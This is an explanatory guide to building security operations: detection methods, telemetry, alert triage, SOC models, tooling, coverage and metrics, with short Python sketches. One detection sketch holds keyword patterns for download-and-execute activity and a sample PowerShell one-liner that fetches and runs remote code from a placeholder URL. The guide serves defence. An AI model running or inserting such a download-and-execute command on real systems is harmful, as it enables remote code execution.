Security Operations
Security operations encompasses the people, processes, and technology that detect, analyse, and respond to security events across an organisation’s environment. A Security Operations Centre (SOC) provides the organisational structure for these capabilities, whether implemented as dedicated staff, shared responsibilities, or outsourced services. The function exists to reduce the time between an adversary’s initial access and the organisation’s detection and containment of that access.
Mission-driven organisations face a particular challenge: the same resource constraints that limit security investment also make them attractive targets for adversaries who assume weak defences. Effective security operations must therefore be designed for the capacity actually available, not an idealised staffing model. A single IT person reviewing authentication logs weekly provides more security value than an unstaffed SIEM generating ignored alerts.
- Security Operations Centre
- The function responsible for monitoring, detecting, and responding to security events. May be a physical location, a virtual team, a managed service, or a defined responsibility within a broader IT role.
- Security Event
- An observable occurrence in a system or network that has potential security relevance. Events become incidents when analysis determines malicious activity or policy violation occurred.
- Security Incident
- A confirmed security event that violates security policy, results in unauthorised access, or indicates malicious activity requiring response.
- Mean Time to Detect
- The average duration between an adversary’s initial compromise and the organisation’s detection of that compromise. Industry median exceeds 200 days; mature security operations achieve under 24 hours.
- Mean Time to Respond
- The average duration between detection of an incident and containment of the threat. Measured in hours for mature operations; days or weeks for organisations without defined response procedures.
- Alert Fatigue
- Degraded analyst responsiveness resulting from excessive false positive alerts. Commonly sets in when more than 30% of alerts require no action, causing analysts to dismiss or ignore legitimate alerts.
Detection Fundamentals
Detection relies on collecting telemetry from systems, normalising that data into a searchable format, and applying logic to identify patterns that indicate malicious activity. Detection logic takes three distinct approaches, which complement rather than replace each other.
Signature-based detection compares observed data against known indicators of compromise. A file hash matching known malware, a network connection to a documented command-and-control server, or an authentication attempt using a credential from a published breach all trigger alerts through pattern matching. This approach catches known threats with high confidence and low false positive rates, but provides no protection against novel attacks or indicators not yet catalogued.
Behavioural detection establishes baselines of normal activity and alerts when observations deviate from those baselines. An administrator account authenticating from a new country, a workstation initiating connections to 50 internal systems within one minute, or a service account suddenly accessing file shares it has never touched all represent behavioural anomalies. This approach can detect unknown threats but generates higher false positive rates, particularly during legitimate changes to business operations.
Heuristic detection applies rules encoding security expertise without requiring exact matches. A PowerShell script downloading content from the internet and immediately executing it matches the pattern of a dropper regardless of the specific URLs or payloads involved. This approach bridges signatures and behaviours, catching variations of known techniques without requiring exact indicators.
Effective detection combines all three approaches. Signature detection handles known threats with minimal analyst burden. Behavioural detection surfaces unusual activity for investigation. Heuristic detection catches technique variations that evade signature matching.
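The three approaches can be illustrated with a minimal sketch. The indicator hash, field names, and pattern strings below are illustrative assumptions, not from any specific SIEM schema or threat feed:

```python
# Illustrative signature, heuristic, and behavioural checks on one mock event.
KNOWN_BAD_HASHES = {"44d88612fea8a8f36de82e1278abb02f"}  # catalogued IOCs

def signature_match(event):
    """Signature: exact match against catalogued indicators."""
    return event.get("file_hash") in KNOWN_BAD_HASHES

def heuristic_match(event):
    """Heuristic: download-then-execute pattern in a command line."""
    cmd = event.get("command_line", "").lower()
    return ("downloadstring" in cmd or "invoke-webrequest" in cmd) and "iex" in cmd

def behavioural_match(event, baseline_countries):
    """Behavioural: authentication from outside the user's baseline countries."""
    country = event.get("auth_country")
    return country is not None and country not in baseline_countries

event = {
    "command_line": "powershell IEX(New-Object Net.WebClient).DownloadString('http://x')",
    "auth_country": "XX",
}
alerts = [name for name, hit in [
    ("signature", signature_match(event)),
    ("heuristic", heuristic_match(event)),
    ("behavioural", behavioural_match(event, {"GB", "KE"})),
] if hit]
print(alerts)  # heuristic and behavioural fire; no signature match
```

Note that the event evades signature matching (no catalogued hash) but the heuristic and behavioural layers still surface it, which is the complementarity the section describes.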
Telemetry Sources
Detection quality depends directly on telemetry coverage. Gaps in visibility create blind spots where adversaries operate undetected. Each telemetry source provides visibility into different stages of an attack.
Endpoint telemetry captures process execution, file system changes, registry modifications, network connections initiated by processes, and user activity on workstations and servers. Endpoint Detection and Response (EDR) tools collect this telemetry continuously, enabling reconstruction of attack chains and identification of malicious process behaviour. A workstation without EDR can be compromised, used for lateral movement, and exfiltrated without generating any detectable events. Coverage targets should reach 100% of managed endpoints; unmanaged devices represent detection gaps.
Network telemetry records connections between systems, traffic volumes, protocol usage, and in some deployments, packet contents. Network detection reveals lateral movement between systems, data exfiltration volumes, and command-and-control communication patterns. Network flow data (source, destination, ports, bytes transferred) provides baseline visibility; full packet capture enables deep inspection at significant storage cost. Encrypted traffic limits content inspection but metadata patterns remain observable.
Authentication telemetry logs every authentication attempt across directory services, applications, VPNs, and cloud platforms. Failed authentications reveal password spraying and brute force attacks. Successful authentications from unusual locations, devices, or times indicate potential account compromise. Authentication logs from the identity provider represent the highest-value single log source because credential compromise precedes nearly all attack progressions.
Cloud platform telemetry captures administrative actions, configuration changes, and resource access across cloud infrastructure. A new administrative user created in the cloud console, a storage bucket made public, or an unusual region receiving resource deployments all appear in cloud audit logs. Cloud providers generate extensive telemetry that often goes uncollected; enabling and centralising these logs closes significant visibility gaps.
Application telemetry records business application events including access attempts, data exports, privilege changes, and error conditions. Applications vary dramatically in logging quality; commercial SaaS platforms typically provide comprehensive audit logs while internally developed applications may log minimally or not at all.
The following diagram illustrates telemetry flow from sources through collection infrastructure:
[Figure 1: Telemetry collection architecture from sources through SIEM processing. EDR and syslog agents on endpoints, NetFlow export from the network, and cloud platform audit logs feed dedicated log collectors and forwarders (endpoint collector, network sensor, cloud connector, application collector); a message queue (Kafka, Redis, or RabbitMQ) aggregates the streams into the SIEM platform, where parsing, enrichment, and detection engines populate the alert queue.]
Alert Triage
Raw detection output requires human analysis to distinguish true threats from false positives, determine severity, and initiate appropriate response. Triage systematically evaluates each alert to enable efficient allocation of analyst attention.
Alert priority derives from two factors: the severity of potential impact if the alert represents true malicious activity, and the fidelity of the detection rule that generated the alert. A high-severity alert from a high-fidelity rule demands immediate investigation. A low-severity alert from a low-fidelity rule can queue for batch review. This two-dimensional prioritisation prevents both ignored critical alerts and analyst time wasted on low-value investigations.
The triage decision tree applies to each alert entering the analyst queue:
[Figure 2: Alert triage decision tree determining investigation priority and escalation. Alerts matching known false-positive patterns are auto-closed and added to the tuning backlog. Otherwise the analyst checks asset context, querying the asset inventory if it is unavailable: critical assets escalate immediately with P1 response and an incident commander engaged; other alerts enter the standard investigation queue with SLAs of 4 hours (P2) or 24 hours (P3). Confirmed malicious activity escalates to incident response; unconfirmed alerts are closed with findings documented.]
Investigation SLAs ensure alerts receive attention within defined timeframes. Priority 1 alerts indicating active compromise require investigation initiation within 15 minutes. Priority 2 alerts suggesting potential compromise require investigation within 4 hours. Priority 3 alerts representing suspicious but low-confidence activity require investigation within 24 hours. Priority 4 informational alerts aggregate for weekly trend review.
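The two-dimensional prioritisation and its SLAs can be sketched as a lookup. The exact matrix values are illustrative assumptions; real deployments tune them per rule:

```python
# Priority derives from potential impact severity and detection-rule fidelity.
SLA_HOURS = {1: 0.25, 2: 4, 3: 24, 4: 168}  # P1: 15 min ... P4: weekly review

def alert_priority(severity: str, fidelity: str) -> int:
    """Map (severity, fidelity) to priority P1 (urgent) .. P4 (informational)."""
    matrix = {
        ("high", "high"): 1,  # demands immediate investigation
        ("high", "low"): 2,
        ("low", "high"): 3,
        ("low", "low"): 4,    # queue for batch review
    }
    return matrix[(severity, fidelity)]

p = alert_priority("high", "high")
print(f"P{p}, investigate within {SLA_HOURS[p]} hours")
```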
Triage efficiency depends on analyst access to contextual information. An alert showing an authentication from an unusual country requires knowing whether that user is travelling. A connection to an unknown external IP requires reputation data about that address. Enrichment provides this context automatically, attaching asset ownership, user department, IP reputation, and threat intelligence to alerts before analyst review.
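A minimal enrichment sketch follows. The lookup tables stand in for a CMDB, an HR directory, and a reputation feed; all names and values are hypothetical:

```python
# Attach asset, user, and IP reputation context to an alert before review.
ASSET_INVENTORY = {"ws-0412": {"owner": "finance", "critical": False}}
USER_DIRECTORY = {"jdoe": {"department": "Finance", "travelling": True}}
IP_REPUTATION = {"203.0.113.9": "known-scanner"}

def enrich(alert: dict) -> dict:
    """Return a copy of the alert with contextual fields attached."""
    enriched = dict(alert)
    enriched["asset"] = ASSET_INVENTORY.get(alert.get("host"), {})
    enriched["user"] = USER_DIRECTORY.get(alert.get("username"), {})
    enriched["ip_reputation"] = IP_REPUTATION.get(alert.get("src_ip"), "unknown")
    return enriched

alert = {"host": "ws-0412", "username": "jdoe", "src_ip": "203.0.113.9"}
print(enrich(alert)["user"]["travelling"])  # the unusual-country alert is explained
```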
Operational Models
Security operations implementations vary based on organisational resources, risk profile, and technical capacity. Each model offers distinct trade-offs between cost, control, expertise, and coverage.
An internal SOC employs dedicated security analysts who monitor, investigate, and respond to events using organisation-owned infrastructure. This model provides maximum control over processes, complete visibility into investigations, and direct alignment with organisational context. Building internal capability requires sustained investment: a minimum viable 24/7 SOC needs eight to ten full-time analysts to cover shifts accounting for leave, training, and attrition. Organisations without this staffing capacity cannot maintain continuous internal operations.
An outsourced SOC engages a Managed Security Service Provider (MSSP) or Managed Detection and Response (MDR) provider to perform monitoring and initial investigation. The provider’s analysts monitor alerts from the organisation’s environment alongside other clients, escalating confirmed incidents to organisational staff for response decisions. This model provides 24/7 coverage without corresponding staffing investment, access to specialist expertise across a broader threat landscape, and often faster deployment than building internal capability. Trade-offs include reduced control over investigation processes, potential context gaps where provider analysts lack organisational knowledge, and dependency on contractual service levels.
A hybrid model combines internal analysts handling business-hours monitoring and incident response with external providers covering nights, weekends, and holidays or providing specialist capabilities. This model balances control with coverage, maintaining internal expertise while avoiding the staffing requirements of full 24/7 operations. Handoff procedures between internal and external teams require careful design to prevent incidents falling between responsibilities.
For organisations without dedicated security staff, security operations integrates into broader IT responsibilities. A distributed model assigns security monitoring tasks to IT staff who handle security alongside other duties. This approach acknowledges that many organisations cannot justify dedicated security headcount, but security events still require detection and response. The distributed model requires automated tooling to reduce manual monitoring burden, clear escalation paths when events exceed IT staff capability, and external support agreements for incident response.
The following diagram shows responsibility distribution across operational models:
[Figure 3: Security operations model comparison showing responsibility distribution.
Internal SOC: organisation Tier 1 analysts handle 24/7 monitoring, initial triage, and alert handling; Tier 2/3 analysts handle deep investigation, incident response, and threat hunting. Infrastructure: organisation-owned SIEM, EDR, SOAR.
Outsourced SOC (MSSP/MDR): provider analysts handle 24/7 monitoring, triage and analysis, and escalation; organisation IT/security contacts receive escalations and own response decisions and remediation actions. Infrastructure: provider platform with organisational log forwarding.
Hybrid: organisation staff cover business hours (daytime monitoring, incident response, threat hunting); provider staff cover nights and weekends (escalation to on-call, initial containment). Infrastructure: shared access to the organisation's SIEM.
Distributed (resource-constrained): IT staff with shared duties perform weekly log review, automated alerting, and basic triage; an external retainer provides on-call response and forensic capability for major incidents. Infrastructure: cloud-native logging, minimal on-premises.]
Tool Integration
Security operations effectiveness depends on integration between detection, investigation, and response tools. Isolated tools create manual handoff burdens and extend response times. Integrated platforms automate data flow and enable coordinated response.
The core tooling stack comprises three categories. Detection platforms including SIEM and EDR generate alerts from collected telemetry. Investigation platforms provide interfaces for analyst queries, case management, and evidence documentation. Response platforms enable containment and remediation actions across managed endpoints and infrastructure.
Integration follows a hub architecture with the SIEM as the central correlation point:
[Figure 4: Security tool integration with SIEM as central correlation hub. A threat intelligence platform (IOC feeds, actor profiles) provides IOC enrichment and a vulnerability scanner (asset vulnerabilities, risk scores) provides asset context to the SIEM, which hosts detection rules, case management, and dashboards and reports. The SIEM sends alerts to the ticketing system (incident and SLA tracking), runs queries through the EDR console (endpoint queries, isolation, evidence collection), and triggers playbooks on the SOAR platform (automated response, enrichment). EDR host isolation and SOAR automated actions operate on managed endpoints and infrastructure.]
Security Orchestration, Automation and Response (SOAR) platforms extend this integration by codifying response procedures as automated playbooks. When a SIEM alert triggers, SOAR executes predefined enrichment steps, queries additional systems for context, and either takes automated containment actions or presents analysts with enriched cases ready for decision. SOAR reduces repetitive manual tasks, ensures consistent response procedures, and documents every action for audit and review.
Organisations without SOAR investment can achieve partial automation through SIEM-native capabilities and scripting. Most SIEM platforms support webhook integrations that trigger external actions on alert conditions. A detection rule identifying a compromised account can automatically invoke an API call to the identity provider suspending that account, achieving automated response without dedicated SOAR infrastructure.
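A webhook handler of this kind might look like the following sketch. The endpoint path, payload shape, and suspension call are hypothetical; consult your identity provider's API reference for the real interface. The transport function is injected so the logic can be exercised without network access:

```python
import json

def handle_webhook(payload: dict, send_request) -> dict:
    """Receive a SIEM alert webhook and suspend the flagged account.

    `send_request(method, url, body)` performs the HTTP call in production;
    tests inject a stub. The rule name and URL below are illustrative.
    """
    if payload.get("rule") != "credential-compromise":
        return {"action": "none"}
    user = payload["username"]
    # Hypothetical suspension endpoint on the identity provider.
    send_request(
        "POST",
        f"https://idp.example.org/api/users/{user}/suspend",
        json.dumps({"reason": payload.get("alert_id", "siem-auto")}),
    )
    return {"action": "suspended", "user": user}

calls = []
result = handle_webhook(
    {"rule": "credential-compromise", "username": "jdoe", "alert_id": "A-1042"},
    lambda method, url, body: calls.append((method, url, body)),
)
print(result)  # {'action': 'suspended', 'user': 'jdoe'}
```

Injecting the transport also makes the automation auditable: every call the handler would have made is captured for review.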
Coverage Planning
Continuous monitoring provides maximum detection opportunity but requires proportional investment. Coverage planning balances detection capability against available resources through deliberate trade-offs.
24/7 monitoring ensures alerts receive attention regardless of when adversaries act. Adversaries deliberately exploit business-hours assumptions; ransomware deployment and data exfiltration commonly occur during nights and weekends when defenders are unavailable. Continuous coverage requires shift staffing, an outsourced provider, or on-call arrangements with automated escalation.
Business hours monitoring concentrates analyst attention during standard working periods, accepting reduced detection outside those hours. This approach suits organisations where resource constraints preclude continuous coverage and risk profile does not justify premium staffing. Automated detection continues during unmonitored hours; alerts queue for morning review rather than receiving immediate investigation.
Risk-based coverage tiers monitoring intensity by asset criticality. Production systems handling sensitive data receive continuous monitoring with aggressive investigation SLAs. Development environments and lower-risk assets receive business hours coverage with extended investigation timeframes. This approach allocates limited resources toward highest-impact protection.
Coverage decisions require explicit acknowledgement of accepted risk. Monitoring only during business hours means an attack initiated at 02:00 on a Saturday may progress undetected for more than 50 hours before the Monday-morning review. Organisations must document this accepted risk and ensure leadership understands the trade-off between coverage cost and detection delay.
For resource-constrained organisations, a pragmatic minimum coverage model prioritises high-value detection over comprehensive monitoring:
Authentication logs from the identity provider receive daily review, focusing on failed authentication patterns, impossible travel (authentication from geographically distant locations within impossible timeframes), and new device registrations. This single log source reveals credential compromise, the precursor to most attack progressions.
Email security alerts receive same-day review, addressing phishing attempts before credential harvesting succeeds. Cloud platform administrative alerts receive same-day review, catching configuration changes that could enable data exposure or account takeover.
Endpoint protection alerts receive next-business-day review for non-blocking detections. Alerts where the endpoint agent blocked the threat allow delayed review; alerts where the agent detected but did not block require expedited attention.
This minimum model provides meaningful detection capability through approximately 30 minutes of daily review effort, a sustainable commitment for IT staff with competing responsibilities.
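The impossible-travel check in the daily authentication review can be sketched as follows. The event format, coordinates, and the 900 km/h speed threshold are illustrative assumptions:

```python
import math

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    r = 6371.0  # mean Earth radius
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def impossible_travel(sign_ins, max_kmh=900):
    """Flag consecutive sign-ins whose implied speed exceeds air travel.

    sign_ins: list of (epoch_seconds, lat, lon), sorted by time.
    """
    flags = []
    for (t1, la1, lo1), (t2, la2, lo2) in zip(sign_ins, sign_ins[1:]):
        hours = max((t2 - t1) / 3600, 1e-9)  # guard against zero intervals
        if haversine_km(la1, lo1, la2, lo2) / hours > max_kmh:
            flags.append((t1, t2))
    return flags

# London at t=0, then Sydney two hours later: far beyond any flight speed.
events = [(0, 51.5, -0.1), (7200, -33.9, 151.2)]
print(impossible_travel(events))  # [(0, 7200)]
```

Identity provider dashboards perform an equivalent check natively; the sketch is useful when reviewing exported logs outside those dashboards.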
Implementation Considerations
For Organisations with Limited IT Capacity
Building security operations capability without dedicated security staff requires focusing on detection sources that provide maximum value with minimum operational burden.
Start with identity provider logs. Microsoft Entra ID, Google Workspace, and Okta all provide authentication logs capturing every sign-in attempt. Configure log export to a searchable destination and establish weekly review of authentication anomalies. Identity provider dashboards highlight risky sign-ins without requiring SIEM infrastructure.
Enable cloud-native security features before investing in additional tooling. Microsoft Defender for Business, Google Workspace security centre, and similar bundled capabilities provide endpoint protection and basic security analytics within existing licensing. These tools lack the depth of dedicated security platforms but deliver substantial detection capability without additional procurement or deployment effort.
Establish an incident response retainer before incidents occur. Identifying and contracting with a security firm for on-call incident response ensures expertise is available when needed without maintaining internal capability. Retainer arrangements typically cost between 5,000 and 15,000 USD annually depending on response time guarantees and included hours.
Consider MDR services providing managed detection with response capability. MDR providers deploy their agents to organisational endpoints, monitor telemetry in their platforms, and alert organisational contacts when investigation warrants attention. Entry-level MDR services for small organisations cost between 3 and 8 USD per endpoint monthly, providing security operations capability without internal infrastructure or expertise.
For Organisations with Established IT Functions
Organisations with dedicated IT teams can implement structured security operations through phased capability building.
Phase 1 establishes centralised log collection. Deploy a SIEM platform capable of ingesting logs from identity providers, cloud platforms, endpoints, and network infrastructure. Open source options including Wazuh and Graylog provide full SIEM capability without licensing costs but require Linux administration skills for deployment and maintenance. Cloud-native options including Microsoft Sentinel integrate tightly with existing Microsoft infrastructure but incur consumption-based costs that scale with log volume.
Phase 2 develops detection content. Default rules in SIEM platforms catch obvious attacks but generate excessive noise in production environments. Develop custom detection rules aligned with your environment’s normal patterns, progressively tuning to reduce false positives while maintaining detection of true threats. Allocate one to two days weekly for detection engineering during the first six months of SIEM operation.
Phase 3 implements structured response procedures. Document investigation and response procedures for common alert types. Define escalation paths, communication templates, and containment authorities. Conduct tabletop exercises validating procedures before requiring them during actual incidents.
Phase 4 adds automation through SOAR or scripted integrations. Identify repetitive triage tasks consuming analyst time and automate enrichment, context gathering, and low-risk response actions. Reserve human decision-making for actions with significant impact or uncertain situations.
Field and Distributed Operations
Organisations with field offices or distributed operations face additional security operations challenges. Intermittent connectivity prevents real-time log streaming from field locations. Local IT support may lack security expertise for initial triage. Time zone distribution complicates escalation and coordination.
Address connectivity limitations through store-and-forward log collection. Deploy lightweight log collectors at field locations that buffer events locally and transmit when connectivity permits. Accept that detection of field-originated events may lag hours or days behind real-time during connectivity outages.
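A store-and-forward collector can be sketched as below. The spool format and transport interface are assumptions for illustration; production collectors (e.g. syslog forwarders with disk buffering) implement the same idea:

```python
import json
import os
import tempfile

class SpoolingCollector:
    """Buffer events to a local spool file; deliver when connectivity permits."""

    def __init__(self, spool_path, transport):
        self.spool_path = spool_path
        self.transport = transport  # callable(event) -> True if delivered

    def record(self, event: dict):
        """Append the event to the local spool so it survives restarts."""
        with open(self.spool_path, "a") as f:
            f.write(json.dumps(event) + "\n")

    def flush(self) -> int:
        """Attempt delivery of all spooled events; keep any that fail."""
        if not os.path.exists(self.spool_path):
            return 0
        with open(self.spool_path) as f:
            events = [json.loads(line) for line in f if line.strip()]
        remaining = [e for e in events if not self.transport(e)]
        with open(self.spool_path, "w") as f:
            for e in remaining:
                f.write(json.dumps(e) + "\n")
        return len(events) - len(remaining)

delivered = []

def deliver(event):
    delivered.append(event)   # stand-in for shipping to the central collector
    return True               # pretend the collector acknowledged receipt

spool = os.path.join(tempfile.mkdtemp(), "spool.jsonl")
c = SpoolingCollector(spool, deliver)
c.record({"msg": "login failure", "host": "field-01"})
print(c.flush())  # 1 event delivered
```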
Develop simplified triage guides for field IT staff who may receive initial security questions. Decision trees distinguishing events requiring escalation from events handleable locally reduce burden on central security resources while ensuring serious events receive appropriate attention.
Technology Options
Open Source
Wazuh provides unified security monitoring combining host-based intrusion detection, log analysis, file integrity monitoring, and vulnerability detection. Wazuh deploys agents to endpoints that forward events to a central manager for correlation and alerting. The platform includes pre-built detection rules, dashboard interfaces, and integration capabilities. Deployment requires Linux servers for the manager and indexer components; single-server deployments suit smaller environments while clustered deployments provide scale and redundancy for larger implementations. Wazuh supports integration with external threat intelligence feeds and exports to additional analytics platforms.
Graylog focuses on log management and SIEM functionality with a searchable event store, alerting engine, and dashboard capabilities. Graylog ingests logs via Syslog, GELF, or Beats protocols and normalises events for consistent querying. The open source version provides core log management; commercial versions add features including archiving, audit logging, and support. Graylog requires Elasticsearch or OpenSearch as its underlying data store.
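Sending an event to a Graylog UDP input can be sketched with a minimal GELF message. GELF requires `version`, `host`, and `short_message` fields, with additional fields underscore-prefixed; 12201 is Graylog's default GELF port. The destination address below is a local stand-in for a real input:

```python
import json
import socket

def gelf_payload(host: str, short_message: str, **extra) -> bytes:
    """Build a minimal GELF 1.1 message; extra fields get the '_' prefix."""
    msg = {"version": "1.1", "host": host, "short_message": short_message}
    msg.update({f"_{k}": v for k, v in extra.items()})
    return json.dumps(msg).encode()

payload = gelf_payload("ws-0412", "failed login", username="jdoe")

# Small uncompressed GELF messages fit in a single UDP datagram.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, ("127.0.0.1", 12201))  # replace with your Graylog input
```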
TheHive provides incident response case management, tracking investigations from initial alert through resolution. TheHive integrates with SIEM platforms to receive alerts and with MISP for threat intelligence enrichment. The platform structures investigations as cases containing observables, tasks, and evidence, providing audit trail documentation for incident handling.
Commercial with Nonprofit Programmes
Microsoft Sentinel provides cloud-native SIEM and SOAR capabilities integrated with the Microsoft ecosystem. Sentinel ingests logs from Microsoft 365, Azure, and third-party sources, applies detection analytics, and orchestrates response through Logic Apps playbooks. Nonprofit organisations accessing Microsoft 365 through nonprofit licensing can deploy Sentinel with consumption-based pricing; cost control requires careful log source selection as pricing scales directly with ingested volume. Data resides in Azure regions; US-headquartered Microsoft is subject to CLOUD Act data access requirements regardless of data storage location.
CrowdStrike Falcon combines endpoint detection and response with threat intelligence and managed threat hunting. Falcon’s lightweight agent deploys to endpoints providing detection, response, and forensic capabilities. CrowdStrike offers nonprofit pricing through partner programmes. The platform’s managed threat hunting (Falcon OverWatch) provides human analysis of endpoint telemetry, identifying threats that automated detection misses.
Arctic Wolf provides security operations as a managed service, monitoring customer environments and investigating alerts with their analyst team. Arctic Wolf suits organisations seeking security operations capability without building internal teams or infrastructure. Pricing follows per-seat models; nonprofit pricing is available through inquiry.
| Platform | Model | Strengths | Considerations |
|---|---|---|---|
| Wazuh | Open source, self-hosted | No licensing costs; full feature set; data sovereignty | Requires Linux administration; self-supported unless purchasing commercial support |
| Graylog | Open source, self-hosted | Strong log management; flexible ingestion | Detection rules less mature than dedicated SIEM; commercial features in paid tiers |
| Sentinel | Commercial SaaS | Deep Microsoft integration; SOAR included; scalable | Consumption pricing unpredictable; CLOUD Act applies; Microsoft ecosystem dependency |
| CrowdStrike | Commercial SaaS | Strong EDR capability; managed hunting option | Endpoint focus requires complementary log management; premium pricing |
| Arctic Wolf | Managed service | Full SOC capability without internal staff; flat pricing | Less customisation than owned platforms; dependency on provider |
Operational Metrics
Security operations effectiveness measurement enables resource justification, process improvement, and executive communication. Metrics should inform operational decisions rather than merely populate dashboards.
Volume metrics establish operational baseline: alerts generated per day, incidents opened per month, and events ingested per source. Volume trends indicate whether detection is expanding appropriately with infrastructure growth or whether noise is increasing without corresponding value.
Timeliness metrics measure response efficiency: mean time from alert generation to analyst acknowledgement, mean time from incident detection to containment, and percentage of alerts meeting investigation SLA. These metrics reveal operational bottlenecks and staffing gaps.
Quality metrics assess detection value: false positive rate by rule, alerts closed without action, and detection coverage against target frameworks (percentage of MITRE ATT&CK techniques with corresponding detection rules). High false positive rates indicate tuning requirements; coverage gaps indicate detection engineering priorities.
Outcome metrics connect security operations to organisational protection: incidents detected internally versus discovered externally, ransomware or data breach events successfully prevented through early detection, and security incidents by root cause enabling preventive investment prioritisation.
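Computing the timeliness and quality metrics from incident records is straightforward; the record shape below is an illustrative assumption:

```python
from statistics import mean

# Each record: timestamps in epoch seconds plus triage outcome flags.
incidents = [
    {"compromised": 0, "detected": 30 * 3600, "contained": 32 * 3600,
     "false_positive": False, "sla_met": True},
    {"compromised": 0, "detected": 42 * 3600, "contained": 45 * 3600,
     "false_positive": False, "sla_met": False},
    {"compromised": 0, "detected": 1 * 3600, "contained": 1 * 3600,
     "false_positive": True, "sla_met": True},
]

true_incidents = [i for i in incidents if not i["false_positive"]]
mttd_h = mean((i["detected"] - i["compromised"]) / 3600 for i in true_incidents)
mttr_h = mean((i["contained"] - i["detected"]) / 3600 for i in true_incidents)
fp_rate = sum(i["false_positive"] for i in incidents) / len(incidents)
sla_compliance = sum(i["sla_met"] for i in incidents) / len(incidents)

print(f"MTTD {mttd_h:.0f}h  MTTR {mttr_h:.1f}h  "
      f"FP {fp_rate:.0%}  SLA {sla_compliance:.0%}")
```

Excluding false positives from MTTD and MTTR keeps those figures about real compromises, while the false positive rate is measured over everything the detection rules produced.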
A representative metrics dashboard for a mid-sized organisation might display:
| Metric | Target | Current | Trend |
|---|---|---|---|
| Alerts per day | Baseline: 150 | 142 | Stable |
| P1 alert acknowledgement | Under 15 min | 8 min | Improving |
| P2 investigation SLA compliance | 95% | 91% | Declining |
| False positive rate | Under 30% | 24% | Stable |
| MITRE ATT&CK coverage | 60% | 47% | Improving |
| MTTD (internal detection) | Under 48 hours | 36 hours | Stable |
| MTTR (containment) | Under 4 hours | 2.5 hours | Stable |
Declining P2 SLA compliance despite adequate P1 response suggests analyst capacity saturation where urgent alerts receive appropriate attention but lower-priority work queues excessively. This metric pattern supports staffing or automation investment cases.